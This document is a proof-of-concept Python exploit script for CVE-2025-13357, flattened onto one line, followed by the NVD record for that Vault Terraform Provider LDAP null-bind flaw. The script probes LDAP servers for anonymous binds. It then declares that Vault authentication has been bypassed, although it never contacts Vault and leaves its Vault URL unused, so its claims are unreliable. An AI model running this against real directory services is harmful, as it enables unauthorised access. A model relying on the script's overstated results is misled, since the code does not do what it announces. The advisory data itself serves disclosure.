CVE-2025-13357

# CVE-2025-13357 PoC - LDAP Null Bind Authentication Bypass # Target: HashiCorp Vault with misconfigured LDAP auth method import ldap import requests def check_null_bind_vulnerability(vault_url, ldap_server): """ Check if LDAP server allows null bind (vulnerable configuration) """ try: # Attempt null bind with empty password conn = ldap.initialize(ldap_server) conn.protocol_version = ldap.VERSION3 conn.set_option(ldap.OPT_REFERRALS, 0) # Try binding with empty password (should fail if deny_null_bind=true) user_dn = "cn=anonymous,dc=example,dc=com" try: conn.simple_bind_s(user_dn, "") print("[+] VULNERABLE: Null bind allowed - deny_null_bind=false") return True except ldap.INVALID_CREDENTIALS: print("[-] SAFE: Null bind rejected - deny_null_bind=true") return False except Exception as e: print(f"[-] Error: {e}") return False def exploit_vault_auth_bypass(vault_url, ldap_server): """ Exploit authentication bypass in Vault Terraform Provider """ # Step 1: Identify vulnerable configuration is_vulnerable = check_null_bind_vulnerability(vault_url, ldap_server) if is_vulnerable: # Step 2: Perform null bind to LDAP server conn = ldap.initialize(ldap_server) conn.simple_bind_s("", "") # Null bind # Step 3: Use authenticated session to access Vault # Note: Actual exploitation depends on Vault configuration print("[+] Null bind successful - authentication bypass achieved") print("[!] Attacker can now access sensitive Vault resources") else: print("[-] Target not vulnerable") # Usage if __name__ == "__main__": vault_url = "https://vault.example.com:8200" ldap_server = "ldap://ldap.example.com:389" exploit_vault_auth_bypass(vault_url, ldap_server)

{"cve": {"id": "CVE-2025-13357", "sourceIdentifier": "[email protected]", "published": "2025-11-21T15:15:51.313", "lastModified": "2025-12-10T21:00:48.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vault’s Terraform Provider incorrectly set the default deny_null_bind parameter for the LDAP auth method to false by default, potentially resulting in an insecure configuration. If the underlying LDAP server allowed anonymous or unauthenticated binds, this could result in authentication bypass. This vulnerability, CVE-2025-13357, is fixed in Vault Terraform Provider v5.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1188"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hashicorp:terraform_provider:*:*:*:*:*:vault:*:*", "versionStartIncluding": "4.2.0", "versionEndExcluding": "5.5.0", "matchCriteriaId": "C152B8B1-F10F-4B82-AD90-6893D062EDC7"}]}]}], "references": [{"url": "https://discuss.hashicorp.com/t/hcsec-2025-33-vault-terraform-provider-applied-incorrect-defaults-for-ldap-auth-method/76822", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}